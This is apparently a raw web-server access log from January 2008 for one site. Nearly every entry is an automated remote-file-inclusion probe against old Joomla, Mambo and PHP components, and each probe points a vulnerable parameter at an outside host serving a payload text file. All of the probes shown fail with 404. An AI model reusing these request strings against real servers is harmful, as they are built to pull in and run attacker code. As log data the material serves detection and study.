205.134.252.26 - - [03/Jan/2008:10:16:49 -0800] "GET /logs/access_071224.log//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.phphttp://www.geocities.com/ibn_yosef/safeid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.134.252.26 - - [03/Jan/2008:10:16:49 -0800] "GET //administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.phphttp://www.geocities.com/ibn_yosef/safeid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.134.252.26 - - [03/Jan/2008:10:16:49 -0800] "GET /logs//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.phphttp://www.geocities.com/ibn_yosef/safeid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.17.3.183 - - [03/Jan/2008:10:17:18 -0800] "GET /logs/access_071224.log//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.phphttp://www.richmondcitywatch.com/albums_g2/locks/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.17.3.183 - - [03/Jan/2008:10:17:18 -0800] "GET /logs/access_071224.log//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.phphttp://www.richmondcitywatch.com/albums_g2/locks/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.17.3.183 - - [03/Jan/2008:10:17:18 -0800] "GET //administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.phphttp://www.richmondcitywatch.com/albums_g2/locks/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.17.3.183 - - [03/Jan/2008:10:17:18 -0800] "GET //administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.phphttp://www.richmondcitywatch.com/albums_g2/locks/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.17.3.183 - - [03/Jan/2008:10:17:19 -0800] "GET /logs//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.phphttp://www.richmondcitywatch.com/albums_g2/locks/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.17.3.183 - - [03/Jan/2008:10:17:19 -0800] "GET /logs//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.phphttp://www.richmondcitywatch.com/albums_g2/locks/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.67.231.247 - - [03/Jan/2008:10:17:56 -0800] "GET /logs/access_071224.log//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.phphttp://www.geocities.com/ibn_yosef/safeid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.67.231.247 - - [03/Jan/2008:10:17:57 -0800] "GET //administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.phphttp://www.geocities.com/ibn_yosef/safeid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.67.231.247 - - [03/Jan/2008:10:17:58 -0800] "GET /logs//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.phphttp://www.geocities.com/ibn_yosef/safeid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.0.200.9 - - [03/Jan/2008:10:19:03 -0800] "GET /logs/access_071222.log/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.phphttp://www.psytown.com/stats/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.246.15.59 - - [03/Jan/2008:10:19:27 -0800] "GET /logs/access_071222.log/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.phphttp://aLie-a.biz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.99.64 - - [03/Jan/2008:10:19:30 -0800] "GET /logs/access_071222.log/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.phphttp://thermair.co.uk//media/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.246.15.59 - - [03/Jan/2008:10:19:32 -0800] "GET /logs/access_071222.log/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.phphttp://aLie-a.biz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
201.234.205.32 - - [03/Jan/2008:10:19:37 -0800] "GET /logs/administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=http://www.baptistwebdesign.com/mambots/content/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
201.234.205.32 - - [03/Jan/2008:10:19:37 -0800] "GET /administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=http://www.baptistwebdesign.com/mambots/content/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
74.6.28.201 - - [03/Jan/2008:10:20:26 -0800] "GET /logs/access_071007.log HTTP/1.0" 200 56320 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
205.134.252.26 - - [03/Jan/2008:10:21:05 -0800] "GET /logs/access_071222.log//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.phphttp://www.geocities.com/ibn_yosef/safeid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.134.252.26 - - [03/Jan/2008:10:21:09 -0800] "GET /logs/access_071224.log/rfihttp://www.geocities.com/ibn_yosef/safeid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.134.252.26 - - [03/Jan/2008:10:21:09 -0800] "GET /rfihttp://www.geocities.com/ibn_yosef/safeid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.134.252.26 - - [03/Jan/2008:10:21:09 -0800] "GET /logs/rfihttp://www.geocities.com/ibn_yosef/safeid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.17.3.183 - - [03/Jan/2008:10:22:24 -0800] "GET /logs/access_071222.log//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.phphttp://www.richmondcitywatch.com/albums_g2/locks/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.17.3.183 - - [03/Jan/2008:10:22:24 -0800] "GET /logs/access_071222.log//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.phphttp://www.richmondcitywatch.com/albums_g2/locks/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.67.231.247 - - [03/Jan/2008:10:22:57 -0800] "GET /logs/access_071224.log/rfihttp://www.geocities.com/ibn_yosef/safeid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.67.231.247 - - [03/Jan/2008:10:22:57 -0800] "GET /rfihttp://www.geocities.com/ibn_yosef/safeid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.67.231.247 - - [03/Jan/2008:10:22:58 -0800] "GET /logs/rfihttp://www.geocities.com/ibn_yosef/safeid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.67.231.247 - - [03/Jan/2008:10:23:24 -0800] "GET /logs/access_071224.log/rfihttp://www.geocities.com/ibn_yosef/safeid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.67.231.247 - - [03/Jan/2008:10:23:24 -0800] "GET /rfihttp://www.geocities.com/ibn_yosef/safeid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.67.231.247 - - [03/Jan/2008:10:23:25 -0800] "GET /logs/rfihttp://www.geocities.com/ibn_yosef/safeid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.67.231.247 - - [03/Jan/2008:10:24:30 -0800] "GET /logs/access_071222.log//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.phphttp://www.geocities.com/ibn_yosef/safeid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
210.245.120.9 - - [03/Jan/2008:10:24:42 -0800] "GET //sources/template.php?CONFIG[main_path]=http://dvl.com.sapo.pt/www.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
210.245.120.9 - - [03/Jan/2008:10:24:42 -0800] "GET /logs//sources/template.php?CONFIG[main_path]=http://dvl.com.sapo.pt/www.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
87.106.26.118 - - [03/Jan/2008:10:24:47 -0800] "GET /logs/access_071220.log/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.26.118 - - [03/Jan/2008:10:24:48 -0800] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.26.118 - - [03/Jan/2008:10:24:48 -0800] "GET /logs/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.246.15.59 - - [03/Jan/2008:10:25:07 -0800] "GET /administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.phphttp://thermair.co.uk//media/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.243.254.130 - - [03/Jan/2008:10:25:28 -0800] "GET /administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.phphttp://theninjalegion.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.246.15.59 - - [03/Jan/2008:10:26:05 -0800] "GET /logs/access_071222.log/modules/Forums/favorites.php?nuke_bb_root_http://thermair.co.uk//media/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.246.15.59 - - [03/Jan/2008:10:26:05 -0800] "GET /logs/modules/Forums/favorites.php?nuke_bb_root_http://thermair.co.uk//media/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.243.254.130 - - [03/Jan/2008:10:26:27 -0800] "GET /logs/access_071224.log/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.phphttp://theninjalegion.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.243.254.130 - - [03/Jan/2008:10:26:28 -0800] "GET /administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.phphttp://theninjalegion.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.243.254.130 - - [03/Jan/2008:10:26:28 -0800] "GET /logs/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.phphttp://theninjalegion.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.67.231.247 - - [03/Jan/2008:10:26:33 -0800] "GET /logs/access_071224.log/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.phphttp://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.67.231.247 - - [03/Jan/2008:10:26:34 -0800] "GET /administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.phphttp://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.67.231.247 - - [03/Jan/2008:10:26:35 -0800] "GET /logs/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.phphttp://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.238.22.25 - - [03/Jan/2008:10:28:39 -0800] "GET /logs/access_071222.log/modules/Forums/favorites.php?nuke_bb_root_http://thermair.co.uk//media/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
63.238.22.25 - - [03/Jan/2008:10:28:39 -0800] "GET /logs/modules/Forums/favorites.php?nuke_bb_root_http://thermair.co.uk//media/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
216.67.231.247 - - [03/Jan/2008:10:29:33 -0800] "GET /logs/access_071220.log/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.laila.jp/item_pics/derf/testador.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.67.231.247 - - [03/Jan/2008:10:29:34 -0800] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.laila.jp/item_pics/derf/testador.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.64.132.254 - - [03/Jan/2008:10:29:39 -0800] "GET /logs/access_071224.log/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.phphttp://www.psytown.com/stats/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [03/Jan/2008:10:29:40 -0800] "GET /administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.phphttp://www.psytown.com/stats/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [03/Jan/2008:10:29:40 -0800] "GET /logs/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.phphttp://www.psytown.com/stats/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
216.67.231.247 - - [03/Jan/2008:10:29:40 -0800] "GET /logs/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.laila.jp/item_pics/derf/testador.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.17.101.126 - - [03/Jan/2008:10:30:39 -0800] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://seidokan.lostfieldhk.com//php/pafiledb/images/test?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
216.17.101.126 - - [03/Jan/2008:10:30:40 -0800] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://seidokan.lostfieldhk.com//php/pafiledb/images/test?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
84.242.64.153 - - [03/Jan/2008:10:31:08 -0800] "GET /logs/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.phphttp://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.242.64.153 - - [03/Jan/2008:10:31:09 -0800] "GET /administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.phphttp://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.246.15.59 - - [03/Jan/2008:10:31:19 -0800] "GET /logs/access_071224.log/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.phphttp://thermair.co.uk//media/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.246.15.59 - - [03/Jan/2008:10:31:20 -0800] "GET /logs/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.phphttp://thermair.co.uk//media/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.67.231.247 - - [03/Jan/2008:10:32:41 -0800] "GET /logs/access_071220.log/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.geocities.com/ibn_yosef/safeid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.67.231.247 - - [03/Jan/2008:10:32:42 -0800] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.geocities.com/ibn_yosef/safeid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.67.231.247 - - [03/Jan/2008:10:32:44 -0800] "GET /logs/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.geocities.com/ibn_yosef/safeid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.67.231.247 - - [03/Jan/2008:10:33:08 -0800] "GET /logs/access_071222.log/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.phphttp://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.64.132.254 - - [03/Jan/2008:10:33:51 -0800] "GET /logs/access_071222.log/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.phphttp://www.psytown.com/stats/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
64.246.15.59 - - [03/Jan/2008:10:34:56 -0800] "GET /logs/access_071222.log/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.phphttp://thermair.co.uk//media/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.242.64.153 - - [03/Jan/2008:10:35:32 -0800] "GET /logs/scanhttp://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.242.64.153 - - [03/Jan/2008:10:35:32 -0800] "GET /scanhttp://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.208.68.5 - - [03/Jan/2008:10:39:43 -0800] "GET /logs/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.208.68.5 - - [03/Jan/2008:10:39:43 -0800] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
81.21.78.60 - - [03/Jan/2008:10:40:50 -0800] "GET /logs/access_071224.log/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.phphttp://claroline.lct-net.cl/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.241.168.186 - - [03/Jan/2008:10:40:51 -0800] "GET /administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.phphttp://claroline.lct-net.cl/id??? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.241.168.186 - - [03/Jan/2008:10:40:51 -0800] "GET /logs/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.phphttp://claroline.lct-net.cl/id??? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.193.248.204 - - [03/Jan/2008:10:41:57 -0800] "GET /logs/access_071224.log/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.phphttp://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.193.248.204 - - [03/Jan/2008:10:41:57 -0800] "GET /administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.phphttp://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.193.248.204 - - [03/Jan/2008:10:41:58 -0800] "GET /logs/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.phphttp://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.241.242.25 - - [03/Jan/2008:10:43:28 -0800] "GET /logs/access_071224.log//skin/zero_vote/error.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.241.242.25 - - [03/Jan/2008:10:43:42 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.23.203 - - [03/Jan/2008:10:45:24 -0800] "GET /bikes/dteel/ HTTP/1.0" 200 8117 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
212.241.168.186 - - [03/Jan/2008:10:46:31 -0800] "GET /logs/access_071224.log/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.phphttp://claroline.lct-net.cl/id??? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.241.168.186 - - [03/Jan/2008:10:46:32 -0800] "GET /administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.phphttp://claroline.lct-net.cl/id??? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.241.168.186 - - [03/Jan/2008:10:46:32 -0800] "GET /logs/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.phphttp://claroline.lct-net.cl/id??? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.193.248.204 - - [03/Jan/2008:10:47:54 -0800] "GET /logs/access_071224.log/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.phphttp://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.193.248.204 - - [03/Jan/2008:10:47:55 -0800] "GET /administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.phphttp://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.193.248.204 - - [03/Jan/2008:10:47:55 -0800] "GET /logs/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.phphttp://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.8.71 - - [03/Jan/2008:10:48:45 -0800] "GET /mobileoffice/?D=A HTTP/1.0" 200 5008 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
208.101.6.202 - - [03/Jan/2008:10:51:31 -0800] "GET /logs/access_071224.log//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.phphttp://www.richmondcitywatch.com/albums_g2/locks/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.101.6.202 - - [03/Jan/2008:10:51:34 -0800] "GET //administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.phphttp://www.richmondcitywatch.com/albums_g2/locks/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.241.242.25 - - [03/Jan/2008:10:53:27 -0800] "GET /logs/access_071218.log//skin/zero_vote/error.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.5.54.68 - - [03/Jan/2008:10:54:41 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
70.131.251.61 - - [03/Jan/2008:11:01:38 -0800] "GET /administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.phphttp://my3dwork.com/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.131.251.61 - - [03/Jan/2008:11:01:38 -0800] "GET /administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.phphttp://volta21.110mb.com/2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.67.231.247 - - [03/Jan/2008:11:03:27 -0800] "GET /logs/access_071220.log/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.67.231.247 - - [03/Jan/2008:11:03:27 -0800] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.67.231.247 - - [03/Jan/2008:11:03:29 -0800] "GET /logs/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.241.168.186 - - [03/Jan/2008:11:04:45 -0800] "GET /logs/access_071224.log//skin/zero_vote/error.php?dir=http://claroline.lct-net.cl/id??? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.241.168.186 - - [03/Jan/2008:11:04:45 -0800] "GET //skin/zero_vote/error.php?dir=http://claroline.lct-net.cl/id??? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.241.168.186 - - [03/Jan/2008:11:04:46 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://claroline.lct-net.cl/id??? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.241.168.186 - - [03/Jan/2008:11:05:41 -0800] "GET /logs/access_071218.log//skin/zero_vote/error.php?dir=http://claroline.lct-net.cl/id??? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.67.231.247 - - [03/Jan/2008:11:06:14 -0800] "GET /logs/access_071224.log//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.phphttp://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.101.6.202 - - [03/Jan/2008:11:06:14 -0800] "GET /logs/access_071222.log//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.phphttp://www.richmondcitywatch.com/albums_g2/locks/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.131.251.61 - - [03/Jan/2008:11:06:14 -0800] "GET /logs/access_071224.log/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.phphttp://volta21.110mb.com/2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.67.231.247 - - [03/Jan/2008:11:06:14 -0800] "GET //administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.phphttp://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.131.251.61 - - [03/Jan/2008:11:06:15 -0800] "GET /logs/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.phphttp://volta21.110mb.com/2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.67.231.247 - - [03/Jan/2008:11:06:15 -0800] "GET /logs//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.phphttp://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.131.251.61 - - [03/Jan/2008:11:06:20 -0800] "GET /logs/access_071224.log/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.phphttp://my3dwork.com/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.131.251.61 - - [03/Jan/2008:11:06:20 -0800] "GET /logs/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.phphttp://my3dwork.com/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.106.46.84 - - [03/Jan/2008:11:08:57 -0800] "GET /logs/access_071221.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.buysellghana.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.46.84 - - [03/Jan/2008:11:08:58 -0800] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.buysellghana.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.46.84 - - [03/Jan/2008:11:08:58 -0800] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.buysellghana.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
70.131.251.61 - - [03/Jan/2008:11:10:40 -0800] "GET /logs/access_071222.log/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.phphttp://my3dwork.com/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.131.251.61 - - [03/Jan/2008:11:10:42 -0800] "GET /logs/access_071222.log/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.phphttp://volta21.110mb.com/2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
